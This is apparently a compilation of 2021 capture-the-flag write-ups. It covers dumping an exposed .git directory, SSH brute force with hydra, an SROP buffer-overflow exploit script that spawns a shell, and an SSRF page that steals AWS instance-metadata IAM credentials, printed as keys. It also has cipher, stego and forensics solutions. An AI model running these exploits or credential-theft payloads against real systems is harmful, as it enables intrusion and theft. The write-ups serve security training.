protected]> 1614126014 -0500 commit: Management said I need to remove the team details so I redacted that page and added it to robots.txt* Connection #0 to host 34.117.193.93 left intact``` ```$ curl -v 34.117.193.93:80/.git/logs/refs/heads/master* Trying 34.117.193.93:80...* Connected to 34.117.193.93 (34.117.193.93) port 80 (#0)> GET /.git/logs/refs/heads/master HTTP/1.1> Host: 34.117.193.93> User-Agent: curl/7.74.0> Accept: */*>* Mark bundle as not supporting multiuse< HTTP/1.1 200 OK< Date: Sat, 13 Mar 2021 14:13:07 GMT< Server: Apache/2.4.25 (Debian)< Last-Modified: Wed, 24 Feb 2021 00:06:36 GMT< ETag: "271-5bc09ceee3b00"< Accept-Ranges: bytes< Content-Length: 625< Via: 1.1 google<0000000000000000000000000000000000000000 1142cc3145fdba8d9eb8f9c9e7ee79bdfda64d9a Leo Rison <[email protected]> 1614124430 -0500 commit (initial): Added initial assets and landing page1142cc3145fdba8d9eb8f9c9e7ee79bdfda64d9a 87b17a86409582c162e260795afdf104dc1d46b1 Leo Rison <[email protected]> 1614124968 -0500 commit: Added the Meet The Team page87b17a86409582c162e260795afdf104dc1d46b1 8e9e7afad5d1f7c6c3dcf322a3a94aeebc1e0073 Leo Rison <[email protected]> 1614125173 -0500 commit: Management said I need to remove the team details so I redacted that page and added it to robots.txt* Connection #0 to host 34.117.193.93 left intact``` Every-time you create a file, and track it, git compresses it and stores it into its own data structure. The compressed object will have a unique name, a hash, and will be stored under the object directory. And according to the [Git documentation](https://git-scm.com/book/en/v2/Git-Internals-Git-Objects), each commit should give three different object files; the `commit`, the `tree` and the `blob`. Above, we can see the hashes for each commit, and if the hash of a file is `87b17a86409582c162e260795afdf104dc1d46b1`, git will store it in the `.git/objects/87` folder under the file name `b17a86409582c162e260795afdf104dc1d46b1`. The `commit` hash `87b17a...` is the one that seems it might have the full meet_the_team.html file in it, so grabbing the object file with wget ```$ wget 34.117.193.93:80/.git/objects/87/b17a86409582c162e260795afdf104dc1d46b1--2021-03-13 14:36:33-- http://34.117.193.93/.git/objects/87/b17a86409582c162e260795afdf104dc1d46b1Connecting to 34.117.193.93:80... connected.HTTP request sent, awaiting response... 200 OKLength: 177Saving to: ‘b17a86409582c162e260795afdf104dc1d46b1’b17a86409582c162e260795afdf104dc1d46b1 100%2021-03-13 14:36:34 (36.7 MB/s) - ‘b17a86409582c162e260795afdf104dc1d46b1’ saved [177/177]``` At this point, it turned out the best thing to do was to init a new git repo locally, and start rebuilding the file-structure from the target host. ```$ git init$ cd .git/objects$ mkdir 87 && cd 87/$ wget 34.117.193.93:80/.git/objects/87/b17a86409582c162e260795afdf104dc1d46b1``` This should leave me with the commit hash in the folder that git would expect, and I can now try using the build-in git tools to have a look: ```$ git cat-file -p 87b17tree e4b05dc6b28a9c9a023c8bf998ce548a125dbcadparent 1142cc3145fdba8d9eb8f9c9e7ee79bdfda64d9aauthor Leo Rison <[email protected]> 1614124968 -0500committer Leo Rison <[email protected]> 1614124968 -0500``` Perfect, we now know the `tree`hash is `e4b05dc6b28a9c9a023c8bf998ce548a125dbcad`, so time to recreate its folder inside of `.git/objects` and see whats inside ```$ mkdir e4 && cd e4/$ wget 34.117.193.93:80/.git/objects/e4/b05dc6b28a9c9a023c8bf998ce548a125dbcad$ git cat-file -p e4b05040000 tree 71f61d1666dcbd3e8e63f9b1c2e3cd9a6465fe65 assets100644 blob 7b74d5ec40c3014c2be272f1a9d1e1896f3f56a4 index.html100644 blob aa133c2b96c58dc78f775cc02632a9a4685e8b46 meet-the-team.html``` And there we have our `blob` hashes! Now it is time to finally get that `meet-the-team.html` file I am after ```$ mkdir aa && cd aa/$ wget 34.117.193.93:80/.git/objects/aa/133c2b96c58dc78f775cc02632a9a4685e8b46$ git cat-file -p aa133 > meet-the-team.html$ cat meet-the-team.html``` This gives us no flags ?, but gives us a list of some interesting employees! ## GitTools Ok, so it seems like it is time to try something different... Let see if we can't just dump out the whole git repository using [GitTools](https://github.com/internetwache/GitTools). Using the `Dumper` and the `Extractor` to get as much as possible from the `.git/`-folder: ```$ mkdir git-dump && cd git-dump$ ./gitdumper.sh https://constellations.page/.git/ ./..$ ./extractor.sh ./ processed-repo``` It turns out I did not really need to do the extraction step (or much else of the above for that matter!!) - but I was curious. At this point, we can view the complete change-log for the repo. And yes - if we check the latest commit via `git show` or some GUI maybe - we get the flag if we look at the diff! **I could have gotten this flag so much earlier had I either looked for some tool to extract `.git` directories sooner - or looked at either _the correct version_ of meet-the-team.html or the commit logs before! But I got there in the end ?** ## Employee List - Orion Morra — Support- Lyra Patte — Marketing- Leo Rison — Development- Gemini Coley — Operations- Hercules Scoxland — Sales- Vela Leray — Management- Pavo Welly — HR- Gus Rodry — Accounting
## SolutionBased on past experience, this appears to be the programming language [Brainfuck](https://en.wikipedia.org/wiki/Brainfuck). Use a [Brainfuck interpreter](https://fatiherikli.github.io/brainfuck-visualizer/) to run the source. ## Flag**flag{wtf_is_brainfuck}**
## SolutionThe flag appears to be in the line `Nze szne ug "zdat{qyyegcuvvurlqfy}"` This would mean `zdat` must decrypt to `flag`. The letters are not shifted from `flag` by the same amount, so the cryptosystem used is not a simple shift cipher like Caesar's, but probably a Vigenere cipher. For `zdat` to decrypt to `flag`, the portion of the key would need to be `usan`. By guessing that the plaintext is likely "The flag is flag{...}", we can recover the rest of the key as `anonymous`, and the message decrypts to:```There are many theories about us. That we’re anarchists, kids, crazy film-buffs that saw one too many superhero movies. The truth is, we are all these things. Anonymous is a symbol, like the flag a country flies. The flag is the symbol of the country. Our masks are our national identity. We are not Anonymous – we represent the ideals of Anonymous. Truth, freedom and the removal of censorship. Like any symbol, we affix it wherever we go, as you have seen from street protests. We have no leaders, civilians or soldiers. We are all one. We run operations because that is what the group decides to do. We choose targets because that is what the people who represent the ideals of Anonymous want to fight for. The world is in trouble. We see it every day – war, poverty, murder. Every day we are bombarded with news and images, as we sit at home safe in the knowledge that we are powerless, that “better” minds are dealing with the situation. But what if you could be the change you want to see? I’m twenty five years old. I went to school and college. I fought for my country then got a job and paid my taxes. If you met me on the street I wouldn’t even register on your radar. I am just another person in a sea of faces. But in cyberspace we are different. We helped free the people of Egypt. We helped fight against Israel as it attempted genocide. We exposed more than fifty thousand paedophiles around the world. We fought the drug cartels. We have taken to the streets to fight for the rights you are letting slip through your fingers. We are Anonymous. The flag is "flag{classicvigenere}" In today’s world we are seen as terrorists or at best dangerous anarchists. We’re called “cowards” and “posers” for hiding behind masks, but who is the real poser? We take away the face and leave only the message. Behind the mask we could be anyone, which is why we are judged by what we say and do, not who we are or what we have. We exist without nationality, skin colour or religious bias.``` ## Flag**flag{classicvigenere}**
In the file `supersecure.7z` found in Challenge 2 is a file named `dataz`. The file can be decoded in CyberChef using the following recipe: ![](https://malcrypt.gitlab.io/blog/ctfs/2021/tenable/images/hacker_exposed/cyber_chef.png) ## Flag**flag{20_minute_adventure}**
While viewing the FTP traffic in Challenge 1, several additional files were also identified and can be extracted using the same steps: - [supersecure.7z](https://gitlab.com/malcrypt/ctf-archive/-/blob/master/2021/tenable/forensics/hacker_exposed/supersecure.7z)- [compression_info.txt](https://gitlab.com/malcrypt/ctf-archive/-/blob/master/2021/tenable/forensics/hacker_exposed/compression_info.txt) `compression_info.txt` tells us that the password for `supersecure.7z` is `bbqsauce`. Extract the contents of the 7z and the second flag is in [pickle_nick.png](https://gitlab.com/malcrypt/ctf-archive/-/blob/master/2021/tenable/forensics/hacker_exposed/pickle_nick.png)
## SolutionThis challenge can be solved by brute force, or more precisely. The brute force approach is to try every printable character at each location of the flag until the number of characters correct in the response from the server increases. This is implemented in [one_byte.py](https://gitlab.com/malcrypt/ctf-archive/-/blob/master/2021/tenable/misc/one_byte/one_byte.py). The more precise method is to recognize that the flag is being XORed by a 4-byte key, and since we know 5 bytes of the plaintext, we can recover the key, then decrypt each value we receive from the server to determine the flag. ## Flag**flag{f0ll0w_th3_whit3_r@bb1t}**
## SolutionA Google search for "tenable peekaboo flag" leads to this page: [https://www.tenable.com/security/research/tra-2018-25](https://www.tenable.com/security/research/tra-2018-25). The flag is on the right side of the article. ## Flag**flag{i_s33_y0u}**
# NASCAR#canbus ```This is Stage 4 of Path 5 in The Mission. After solving this challenge, you may need to refresh the page to see the newly unlocked challenges. CONSTELLATIONS employees rejoice, NASCAR has developed a cloud solution to control cars remotely! You are headed to a race and need to get up and running. Here are some logs that might help you get started. Download the file below and press the Start button on the top-right to begin this challenge. Connect with:nc challenge.nahamcon.com 31333``` We get a filecanbus.log containing a dump of CAN bus messages. When logging in to the challenge, we get a prompt ```$ nc challenge.nahamcon.com 31333 _ _____ _____ _________ ____ / | / / | / ___// ____/ | / __ \ / |/ / /| | \__ \/ / / /| | / /_/ / / /| / ___ |___/ / /___/ ___ |/ _, _//_/ |_/_/ |_/____/\____/_/ |_/_/ |_| Please send the CAN codes to: 1. Lock the car2. Set the MPH speed display to 40 mph``` The dump is very noisy and contains a lot of values. Let us create one with only unique entries. ```$ sort --unique canbus.log > unique_canbus.log``` _Now... there are two ways we could have gone about this. And that is to just try each unique CAN bus ID# with some number. Instead, I decided to read up a bit_ What I eventually found is a CAN bus simulator for cars. I spun that up on a VM and did some testing there. For example, I found that if I sent the command: ```$ while true; do cansend vcan0 244#0000001800; done``` The speedometer went to 40 MPH. And if I tried the values found in the log for `19B#` then the doors would lock. Connecting and inputting those values then produced the flag ```1: 19B#00000F000000Nice! Now let's get up to speed!2: 244#0000001800You are off to the races! Here's the flag they waved as you sped by:flag{e056ee2f338a63d03a2e47aefebf178f}```
# Aero CTF 2021 - Dummyper (454 pts) This the first challenge I did. The challenge's task was:> This stupid program has encrypted our flag.>> We only have a dump left. With a mysterious "dump.7z" that contains a "dump" file. This file is an ELF binary, so we load it in IDA. ## Overview IDA complains about broken section table, but still succeeds to load the bin. We get classical glibc's `__libc_start_main`, and the "main" function which looks like this:```; int __fastcall main(int, char **, char **)main proc nearendbr64push rbpmov rbp, rspcall loc_1691call sub_172Acall sub_188Bmov eax, 0pop rbpretnmain endp ```The first function contains garbage, such as: ``` loc_1691: ; CODE XREF: main+8↓pLOAD:0000000000001691 out 53h, alLOAD:0000000000001693 pop rbpLOAD:0000000000001694 out 1, eax ; DMA controller, 8237A-5.LOAD:0000000000001694 ; channel 0 base address and word countLOAD:0000000000001696 stdLOAD:0000000000001697 adc [rdi+65h], clLOAD:000000000000169A movsbLOAD:000000000000169B mov ebx, 58D66E0AhLOAD:000000000000169B ; ---------------------------------------------------------------------------LOAD:00000000000016A0 dq 91870DBC4BC97160h, 1FEC1165698C4247h, 26B5D424EA599C8Ah ```which probably means that the binary was edited before the dump was taken. A quick look to the next function (`sub_172a`) confirms this: ```c _BYTE *sub_172A(){ _BYTE *result; // rax int i; // [rsp+Ch] [rbp-34h] int j; // [rsp+10h] [rbp-30h] int v3; // [rsp+14h] [rbp-2Ch] int v4; // [rsp+1Ch] [rbp-24h] void *ptr; // [rsp+28h] [rbp-18h] void *v6; // [rsp+38h] [rbp-8h] v3 = getpagesize(); mprotect((char *)&loc_13A9 - (unsigned __int64)&loc_13A9 % v3, v3, 7); ptr = (void *)((__int64 (__fastcall *)(__int64))loc_13A9)(32LL); fread(ptr, 0x20uLL, 1uLL, stream); for ( i = 0; i <= 63; ++i ) { v4 = rand() % 2047; v6 = (void *)((__int64 (__fastcall *)(_QWORD))loc_13A9)(v4); fread(v6, v4, 1uLL, stream); } result = &loc_13A9; for ( j = 0; j <= 895; ++j ) { result = (char *)&loc_13A9 + j; *result ^= *((_BYTE *)ptr + j % 32); } return result;} ```It's obvious to see that the function calls mprotect to allow writing on the .text session, then call `loc_13a9`, which also contains garbage. Then, some part of the text section is xored with a random key. So to analyze further the binary, we need to find the decryption key, which is a 32-byte key. Luckily, we have an amd64 binary, and gcc puts an "endbr64" instruction at the beginning of each section, before the habitual prologue `push rbp, mov rbp, rsp`. So we can recover 8 bytes of the key with partial known plaintext. We have two encrypted functions, and luckily, the first function is at position 0 mod 32, and the second function at pos 8 mod 32, which means we know the first 16 bytes of the key, we have to xor the 8 first bytes of the function with "f30f1efa554889e5" (our prologue). Then, we can manage to "guess" some bytes looking at the partial disassembly, which gives this decoding script:```python #!/usr/bin/python f = open("dump", "rb")buf = f.read()modbuf = bytearray(buf) # Offset of the two first functionsoffset = 0x13a9offset2 = 0x1691 # endbr64; push rbp; mov rbp; rspendbr64 = bytes.fromhex("f30f1efa554889e5") # Get the first 8 bytes of the keyfunc = buf[offset:offset+len(endbr64)]key1 = bytes([x ^ y for x,y in zip(func, endbr64)]) # Get the next 8 bytes of the keyfunc2 = buf[offset2:offset2+len(endbr64)]key2 = bytes([x ^ y for x,y in zip(func2, endbr64)]) # Some guessed bytes according to the disasskey = key1 + key2 + b"\x2d\x27\x57" + b"\x1a\x26" # Luckily we have a function here too, so 8 bytes for freefunc3 = buf[0x13fe:0x13fe+len(endbr64)]key4 = bytes([x ^ y for x,y in zip(func3, endbr64)]) # Guessed bytes againkey = key + key4 + b"\xba\xca\x5e" # Now let's decrypt the encrypted functionsfor i in range(0, 896): modbuf[offset + i] = modbuf[offset + i] ^ key[i % 32] out = open("dump2", "wb")out.write(modbuf)out.close() ```Now we have recovered the full code, we can analyze the dump. ## Analysis of the decrypted dumpThe main function didn't change a lot, but now the `sub_1691` function disassembles correctly. Let's have a look to the decompiled function:```c __int64 sub_1691(){ unsigned int v0; // eax FILE *stream; // [rsp+0h] [rbp-10h] void *ptr; // [rsp+8h] [rbp-8h] randomfile = fopen("/dev/urandom", "r"); v0 = time(0LL); srand(v0); stream = fopen("./flag.txt", "r"); ptr = (void *)alloc_mem(128LL); fread(ptr, 0x80uLL, 1uLL, stream); fclose(stream); return cryptostuff(ptr);} ```The function calls `alloc_mem` which looks like this:```c char *__fastcall alloc_mem(size_t a1){ char *s; // [rsp+18h] [rbp-8h] s = (char *)&unk_5060 + count; memset((char *)&unk_5060 + count, 204, a1); count += a1; return s;} ```to write the flag on it. Then the function calls `cryptostuff`, we'll look into. ```c for ( i = 0; i <= 63; ++i ) { v9 = rand() % 2047; ptr = alloc_mem(v9); fread(ptr, v9, 1uLL, randomfile); } aeskey = alloc_mem(0x20uLL); for ( j = 0; j <= 63; ++j ) { v8 = rand() % 2047; v15 = alloc_mem(v8); fread(v15, v8, 1uLL, randomfile); } aesiv = alloc_mem(0x10uLL); for ( k = 0; k <= 63; ++k ) { v7 = rand() % 2047; v14 = alloc_mem(v7); fread(v14, v7, 1uLL, randomfile); } fread(aeskey, 1uLL, 0x20uLL, randomfile); fread(aesiv, 1uLL, 0x10uLL, randomfile); aes_ctx = alloc_mem(0xC0uLL); for ( l = 0; l <= 63; ++l ) { v6 = rand() % 2047; v13 = alloc_mem(v6); fread(v13, v6, 1uLL, randomfile); } aes_setup_key((__int64)aes_ctx, (__int64)aeskey); aes_setup_iv(aes_ctx, aesiv); return aes_encrypt(aes_ctx, flag, 128LL); ``` The function calls the custom "malloc" to get the AES key and IV (the AES function could be identified thanks to its S-Box which begins with `63h, 7Ch, 77h, 7Bh, 0F2h, 6Bh, 6Fh, 0C5h, 30h, 1, 67h`). To avoid being found easily, a lot of junk allocation with random sizes are performed. Fortunately, those random allocation are performed with `rand`, which is initialized with `srand(time(NULL))`. So we just need to know when the program was run, you can know thanks to the modification date of the "dump" file in the archive. So, the solve script to fetch the flag (I use the offset of the xor key as a check to determine if we got the right seed):```python #!/usr/bin/pythonfrom ctypes import CDLLfrom Crypto.Cipher import AESlibc = CDLL("libc.so.6") # Offset where blocks are allocatedblockoff = 0x5060 f = open("dump", "rb")buf = f.read() # Get the encrypted flagencflag = buf[blockoff:blockoff + 0x80] # Bruteforce timestamps for the 25 Feb. to get the correct seedts = 1614211200for i in range(0, 24*3660): blockpos = 0x80 libc.srand(ts + i) for _ in range(0, 64): blockpos += libc.rand() % 2047 aeskey = buf[blockoff + blockpos:blockoff + blockpos + 0x10] blockpos += 0x20 for _ in range(0, 64): blockpos += libc.rand() % 2047 aesiv = buf[blockoff + blockpos:blockoff + blockpos + 0x10] blockpos += 0x10 for _ in range(0, 64): blockpos += libc.rand() % 2047 blockpos += 0xc0 for _ in range(0, 64): blockpos += libc.rand() % 2047 # If the computed offset is the offset of the xor key in the dump, we won if(blockoff + blockpos == 0x4ba74): print("Found candidate %d" % i) break c = AES.new(aeskey, AES.MODE_CBC, aesiv)print(i)print(c.decrypt(encflag)) ```And the flag we got is `Aero{d37fd6db2f8d562422aaf2a83dc62043}`
## SolutionIf we open the image in `stegsolve` and view Red plane 7, we can see the beginning of the flag: ![](https://malcrypt.gitlab.io/blog/ctfs/2021/tenable/images/easy_stego/red_plane.png) The next portion of the flag is visible in Green plane 7: ![](https://malcrypt.gitlab.io/blog/ctfs/2021/tenable/images/easy_stego/green_plane.png) And the final portion of the flag is visible in Blue plane 7: ![](https://malcrypt.gitlab.io/blog/ctfs/2021/tenable/images/easy_stego/blue_plane.png) ## Flag**flag{Bl4ck_liv3S_MATTER}**
# Hydraulic#hydra #wordlists ```This is Stage 2 of Path 5 in The Mission. After solving this challenge, you may need to refresh the page to see the newly unlocked challenges. Gain access with the information you have gathered thus far and retrieve the flag. Press the Start button on the top-right to begin this challenge.Connect with:ssh -p 30337 challenge.nahamcon.com``` So we have a bit of information available from the previous challenge going into this. In particular, we have some account names and some default passwords and so making those into some lists might be a good way to start off. ## Hydra After making those dictionaries, throwing [hydra](https://allabouttesting.org/examples-of-kali-linux-hydra-tool/#:~:text=Hydra%20is%20a%20pre%2Dinstalled,target%20to%20identify%20correct%20credentials.) at the SSH login with the wordlists generated following the previous challenge `Lyra` ```$ hydra -s 30337 -L users.txt -P default-passwords.txt 35.239.227.150 -t 4 sshHydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-13 21:39:41[DATA] max 4 tasks per 1 server, overall 4 tasks, 520 login tries (l:8/p:65), ~130 tries per task[DATA] attacking ssh://35.239.227.150:30337/[STATUS] 36.00 tries/min, 36 tries in 00:01h, 484 to do in 00:14h, 4 active[STATUS] 29.67 tries/min, 89 tries in 00:03h, 431 to do in 00:15h, 4 active[30337][ssh] host: 35.239.227.150 login: pavo password: starsinthesky[STATUS] 29.29 tries/min, 205 tries in 00:07h, 315 to do in 00:11h, 4 active1 of 1 target successfully completed, 1 valid password foundHydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-13 21:49:39``` Seems our (now) good friend `pavo` didn't change his password, and inside his `home` directory we find our flag! ```$ ssh -p 30337 [email protected]$ lltotal 24drwxr-xr-x 1 pavo pavo 4096 Mar 6 06:16 ./drwxr-xr-x 1 root root 4096 Mar 6 06:15 ../-rw-r--r-- 1 pavo pavo 220 Feb 25 2020 .bash_logout-rw-r--r-- 1 pavo pavo 3771 Feb 25 2020 .bashrc-rw-r--r-- 1 pavo pavo 807 Feb 25 2020 .profile-rw-r--r-- 1 pavo pavo 39 Mar 6 06:15 flag.txt$ cat flag.txtflag{cadbbfd75d2547700221f8c2588e026e}```
## SolutionListening to the wav file it sounds like modem tones. We can use a tool like `minimodem` to decode these tones. We can try different baud rates until one produces a result: ```shell$ minimodem --read 300 -f tx.wav### CARRIER 300 @ 1250.0 Hz ###flag{our_technology_is_immaculate} ### NOCARRIER ndata=35 confidence=2.414 ampl=0.992 bps=300.00 (rate perfect) ###``` ## Flag**flag{our_technology_is_immaculate}**
## SolutionOnce the provided string is base64 decoded, the result is a string of space-separated hex values. Decoding the hex values results in a string that looks like the flag format, but starts with `synt{`. Applying a ROT13 decoding results in the flag. ## Flag**flag{congrats_you_got_me}**
# UTCTF 2021 ## 2Smol > 910>> I made this binary 2smol.> > by `hukc`>> [smol](smol) Tags: _pwn_ _x86-64_ _bof_ _srop_ ## Summary > See [Some Really Ordinary Program](https://github.com/datajerk/ctf-write-ups/tree/master/nahamconctf2021/some-really-ordinary-program) for a nearly an identical writeup. We have nearly nothing to work with but a `read` and `syscall` gadget; using the return value from `read` we can use that to set `rax` so that we can use _srop_. ## Analysis ### Checksec ``` RELRO: No RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x400000) RWX: Has RWX segments``` No mitigations, choose your own adventure--_assuming you can find the bits you need._ ### <strike>Decompile with Ghidra</strike> Disassemble with `objdump` ```assembly0000000000401000 <_start>: 401000: e8 08 00 00 00 call 40100d <main> 401005: b8 3c 00 00 00 mov eax,0x3c 40100a: 0f 05 syscall 40100c: c3 ret 000000000040100d <main>: 40100d: 55 push rbp 40100e: 48 89 e5 mov rbp,rsp 401011: 48 83 ec 08 sub rsp,0x8 401015: 48 8d 7d f8 lea rdi,[rbp-0x8] 401019: e8 05 00 00 00 call 401023 <_read> 40101e: 48 89 ec mov rsp,rbp 401021: 5d pop rbp 401022: c3 ret 0000000000401023 <_read>: 401023: 55 push rbp 401024: 48 89 e5 mov rbp,rsp 401027: 48 83 ec 08 sub rsp,0x8 40102b: 48 89 fe mov rsi,rdi 40102e: bf 00 00 00 00 mov edi,0x0 401033: ba 00 02 00 00 mov edx,0x200 401038: b8 00 00 00 00 mov eax,0x0 40103d: 0f 05 syscall 40103f: 48 89 ec mov rsp,rbp 401042: 5d pop rbp 401043: c3 ret``` Yep, that's all of it. `main` allocates 8 bytes on the stack, and then calls `read` with said stack location, however `read` sets `rdx` to `0x200` creating a buffer overflow. Send anything over 16 bytes (stack + `push rpb`) and you'll segfault. That's all there is folks. Not a lot here. No GOT, very few gadgets, no libc, etc..., total _srop_ fodder. ```0x0000000000400000 0x0000000000401000 0x0000000000000000 r-x smol0x0000000000401000 0x0000000000402000 0x0000000000001000 r-x smol0x0000000000402000 0x0000000000403000 0x0000000000000000 rwx [heap]0x00007ffff7ffa000 0x00007ffff7ffd000 0x0000000000000000 r-- [vvar]0x00007ffff7ffd000 0x00007ffff7fff000 0x0000000000000000 r-x [vdso]0x00007ffffffde000 0x00007ffffffff000 0x0000000000000000 rwx [stack]0xffffffffff600000 0xffffffffff601000 0x0000000000000000 r-x [vsyscall]``` Before getting into the _srop_ details, lets look at the memory map. Other than the stack, there is a 4K page of memory (the heap) that is also `RWX` at `0x402000`. This is something we both have and _know_. The attack is pretty simple, use `read` to _read_ in `0xf` bytes, so that `rax` is `0xf` (rt_sigreturn syscall). Then call `syscall` followed by our sigreturn frame. That frame will change `rsp` to the middle of page `0x402000` (remember stacks grow _down_ in address space), and then set `rip` to `main`. This will basically start us all over again, but this time we know the stack address because we _set_ it. Since we can _read_ and we know _where_ we will be storing that input, we can just send some shellcode to do the rest. ## Exploit ```python#!/usr/bin/env python3 from pwn import * binary = context.binary = ELF('./smol')binary.symbols['main'] = 0x40100d if args.REMOTE: p = remote('pwn.utctf.live', 9998)else: p = process(binary.path)``` Standard pwntools header with a symbol added for `main`. ```pythonsyscall = next(binary.search(asm('syscall')))stack = 0x4027f8 frame = SigreturnFrame()frame.rsp = stackframe.rip = binary.sym.main``` Find a syscall gadget and setup the location of our new stack in the middle of page `0x402000`, then define our rt_sigreturn frame with `rsp` pointing to our new stack and `rip` pointing to `main` ```python# overflow buffer# get control of RIP# call the read function to get 0xf in rax for syscall# sigretpayload = b''payload += 16 * b'A'payload += p64(binary.sym.main)payload += p64(syscall)payload += bytes(frame) p.send(payload)time.sleep(.1)``` The payload just needs to fill up the `8` byte buffer plus 8 bytes for the `push rbp`, then call `main` followed by `syscall` and our frame. > The .1 sleep is required to allow `read` to exit before our next `read` attack. ```python# with read called, get 0xf in raxp.send(constants.SYS_rt_sigreturn * b'A')time.sleep(.1)``` With the payload now running we need to send `0xf` bytes so that `read` will return with `0xf` in `rax`. After that the rt_sigreturn syscall will kick in and update all the registers with values from our frame, including the new stack (`rsp`) and where we should start executing again (`rip`). > The .1 sleep is required to allow `read` to exit before our next `read` attack. ```python# new stack that we know address of and its NX# just put in some shell code and call itpayload = b''payload += 16 * b'A'payload += p64(stack + 8)payload += asm(shellcraft.sh()) p.send(payload)p.interactive()``` Here we are again, at the beginning, all that has changed is we _know_ where the stack is. This time set the return address with the location of our shellcode to be appended at the end. Output: ```bash# ./exploit.py REMOTE=1[*] '/pwd/datajerk/utctf2021/smol/smol' Arch: amd64-64-little RELRO: No RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x400000) RWX: Has RWX segments[+] Opening connection to pwn.utctf.live on port 9998: Done[*] Switching to interactive mode$ iduid=1000(srop) gid=1000(srop) groups=1000(srop)$ cat flag.txtutflag{srop_xd}```
## SolutionViewing the [eml](https://gitlab.com/malcrypt/ctf-archive/-/blob/master/2021/tenable/misc/grandma/provided/tmp.eml) file, the subject line has curly braces in it at the same locations as a flag. It becomes apparent that the subject line is Morse Code where `FWD:` is dot and `RE:` is dash. The subject line thus translates to:```..-. .-.. .- --.{.. ..--.- -- .. ... ... ..--.- .- --- .-..}``` Using an online Morse Code decoder, the flag is recovered. ## Flag**flag{i_miss_aol}**
# Hacking Toolz**Category: Web** ![main](images/main.png) A bunch is going on here. Let's try out each feature. ## Exploring the Site### Cors RedirectorEntering `https://www.google.com` directs us to `http://52.14.108.42/redir.php?url=https%3A%2F%2Fwww.google.com`, and we get slapped with a big `Access Denied` message. Ok, moving on... ### Site PreviewerEntering `https://www.google.com` downloads a PDF file: ![test](images/google-pdf.png) ### Payload GeneratorThis one was just fun and doesn't generate useful information. ## Release NotesThe site had a link to some release notes up top. Let's take a look at them: ```=== Hacking Toolz === ==== Release Notes ==== 1.1 01/12/2020 - Okay, so over the christmas break you guys were being nosey, so a couple of fixes- Redirector : No longer publically accessible, email me and I can add you to the access list.- Because you guys thought it was funny to grab the sweet paid content from S3, we upgraded to instance metadata service version 2. No more metadata for you lol!!! 1.0 12/25/2020 - First Release!- Tools all working properly!- To-Add : more toolz!``` Two takeaways:- Redirector is disabled. We should try and find a way to get around this.- The paid content is hidden in S3, and the site owner is using instance metadata service version 2. ## Crafting a Custom PDFI created a file, `exploit.html`:```html<html> <h1>hello there</h1> <div id="test"></div> <script> document.getElementById("test").innerHTML = 'test'; </script></html>``` Created a mini local server to host it: ```$ python3 -m http.serverServing HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...``` Expose it to the world with ngrok:```$ ngrok http 8000Forwarding https://971047f21108.ngrok.io -> http://localhost:8000``` Requesting `https://971047f21108.ngrok.io/exploit.html`, it renders a pdf containing: ![test-pdf](images/test-pdf.png) Cool. Let's edit the html to test if we can do an SSRF to use the redirector service: ```html<html> <h1>hello there</h1> <div id="dynamic"></div> <script> var url = "http://localhost/redir.php?url=https://www.google.com"; var xhr = new XMLHttpRequest(); xhr.open('GET', url, false); xhr.send(); document.getElementById("dynamic").innerHTML = xhr.responseText; </script></html>``` Requesting our ngrok server again in the previewer, we get the google homepage rendered! This proves we can make calls to other hosts via the redirector. ## Accessing The MetadataThe release notes mentioned that "instance metadata service version 2" was being used. Searching this term, I found [this](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instancedata-data-retrieval.html) Amazon document explaining how to use the service. > To view all categories of instance metadata from within a running instance, use the following URI. > http://169.254.169.254/latest/meta-data/ > The IP address 169.254.169.254 is a link-local address and is valid only from the instance. The doc also says that in order to view the top level metadata for version 2 of the service, we need to do the following:```sh[ec2-user ~]$ TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"` \&& curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/meta-data/``` Ok, we need to put together two network requests. One to retrieve a token value, and another to get the metadata with the token. Let's make another iteration of `exploit.html` that can do this: ```html<html> <h1>hello there</h1> <div id="tokenResponse"></div> <div id="metadataResponse"></div> <div id="error"></div> <script> var tokenUrl = "http://localhost/redir.php?url=http://169.254.169.254/latest/api/token"; var metadataURL = "http://localhost/redir.php?url=http://169.254.169.254/latest/meta-data/"; var xhr = new XMLHttpRequest(); var token = ''; try { xhr.open('PUT', tokenUrl, false); xhr.setRequestHeader('X-aws-ec2-metadata-token-ttl-seconds', '21600'); xhr.send(); token = xhr.responseText; document.getElementById("tokenResponse").innerHTML = "Token: " + token; xhr.open('GET', metadataURL, false); xhr.setRequestHeader('X-aws-ec2-metadata-token', token); xhr.send(); document.getElementById("metadataResponse").innerHTML = xhr.responseText; } catch(err) { document.getElementById('error').innerHTML = err.message; } </script></html>``` Let's try it: ![metadata](images/metadata-pdf.png) ? nice. I explored the metadata folders until I found this interesting one: `meta-data/iam/security-credentials/S3Role`. I changed the `metadataURL` in the HTML file to "http://localhost/redir.php?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/S3Role" (and added some lines to word wrap the output). Let's PDF it: ![password](images/password-pdf.png) I installed the aws cli, and changed my `~/.aws/credentials` file to include the password information from the PDF:```[default]aws_access_key_id = ASIA5HRVYIWQIQXZD5FCaws_secret_access_key = NRne2ZtwuCFrlQcd53QDLUDkRxyO6DrHbIjCzdR0aws_session_token = 